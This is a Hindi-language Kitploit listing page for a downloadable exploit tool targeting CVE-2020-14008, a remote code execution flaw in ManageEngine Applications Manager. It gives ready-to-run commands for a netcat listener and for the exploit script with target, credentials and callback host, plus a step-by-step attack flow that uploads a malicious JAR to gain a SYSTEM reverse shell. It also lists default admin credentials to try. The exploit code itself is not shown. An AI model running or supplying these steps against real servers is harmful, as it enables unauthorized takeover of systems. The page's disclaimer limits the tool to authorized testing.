Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-14008 — CVE-2020-14008 - ManageEngine Applications Manager RCE | Kitploit
उपकरण/GitHubGitHub/0x0d3ad/cve-2020-14008
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHub0x0d3ad/cve-2020-14008

CVE-2020-14008

CVE-2020-14008 - ManageEngine Applications Manager RCE

रिपॉजिटरी देखें
314 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-14008 - ManageEngine Applications Manager RCE

प्रमाणित दूरस्थ कोड निष्पादन Zoho ManageEngine Applications Manager में मनमानी फ़ाइल अपलोड के माध्यम से (संस्करण <= 14720)।

भेद्यता सारांश

टूल डाउनलोड करें
विवरणमान
CVECVE-2020-14008
CVSS7.2 (उच्च)
प्रकारप्रमाणित RCE / मनमानी फ़ाइल अपलोड
उत्पादZoho ManageEngine Applications Manager
प्रभावितसंस्करण 14720 और नीचे
आवश्यकतामान्य व्यवस्थापक क्रेडेंशियल
परिणामSYSTEM-स्तरीय रिवर्स शेल

यह एक्सप्लॉइट Weblogic मॉनिटर क्रेडेंशियल परीक्षण सुविधा का दुरुपयोग करता है। एक प्रमाणित व्यवस्थापक अपेक्षित Weblogic लाइब्रेरी पथ पर एक दुर्भावनापूर्ण weblogic.jar फ़ाइल अपलोड करता है। जब क्रेडेंशियल परीक्षण ट्रिगर होता है, ManageEngine JarLoader.loadClass() और newInstance() के माध्यम से अपलोड किए गए JAR से weblogic.jndi.Environment लोड करता है, जिससे मनमाना जावा कोड निष्पादित होता है।

आवश्यकताएँ

सिस्टम

  • Python 3.x
  • Java JDK (javac और jar PATH पर)
  • nc (netcat) रिवर्स शेल पकड़ने के लिए

Python निर्भरताएँ

root@kitploit:~
pip3 install requests urllib3 lxml

उपयोग

1. लिसनर प्रारंभ करें

root@kitploit:~
nc -lvnp 1337

2. एक्सप्लॉइट चलाएँ

root@kitploit:~
python3 cve-2020-14008.py <URL> <USERNAME> <PASSWORD> <LHOST> <LPORT>

उदाहरण

root@kitploit:~
# मूल
python3 cve-2020-14008.py https://192.168.100.2:8443 admin admin 192.168.100.3 1337

एक्सप्लॉइट प्रवाह

  1. लॉगिन - व्यवस्थापक क्रेडेंशियल से प्रमाणित करें, सत्र कुकी प्राप्त करें
  2. गणना - ManageEngine आधार स्थापना निर्देशिका पुनर्प्राप्त करें
  3. JAR बनाएँ - एक दुर्भावनापूर्ण जावा क्लास (weblogic.jndi.Environment) जिसमें रिवर्स शेल हो, weblogic.jar में संकलित करें
  4. अपलोड करें - निर्देशिका ट्रैवर्सल के माध्यम से JAR को classes/weblogic/version8/ पर अपलोड करें (विकल्प: इसे स्थानांतरित करने के लिए एक निर्धारित कार्य बनाएँ)
  5. ट्रिगर करें - Weblogic क्रेडेंशियल परीक्षण को /testCredential.do पर आमंत्रित करें, जो दुर्भावनापूर्ण क्लास को लोड और इंस्टैंशिएट करता है
  6. शेल - रिवर्स शेल लिसनर से वापस जुड़ता है

डिफ़ॉल्ट क्रेडेंशियल

उपयोगकर्ता नामपासवर्ड
adminadmin
adminpassword
administratoradministrator
guestguest

समस्या निवारण

त्रुटिसमाधान
release version 7 not supportedJava 21+ ने Java 7 लक्ष्य हटा दिया। स्क्रिप्ट --release 8 का उपयोग करती है
FileNotFoundError: weblogic.jarJAR संकलन विफल रहा। javac और jar PATH पर हैं इसकी पुष्टि करें
No valid response from used sessionअमान्य क्रेडेंशियल
Actionname not foundकार्य निर्माण विफल, व्यवस्थापक अनुमतियाँ जाँचें

संदर्भ

  • NVD - CVE-2020-14008
  • Exploit-DB #48793
  • ManageEngine Advisory

अस्वीकरण

यह उपकरण केवल अधिकृत प्रवेश परीक्षण और सुरक्षा अनुसंधान के लिए प्रदान किया गया है। ऐसी प्रणालियों के विरुद्ध अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनका परीक्षण करने की अनुमति नहीं है, अवैध है।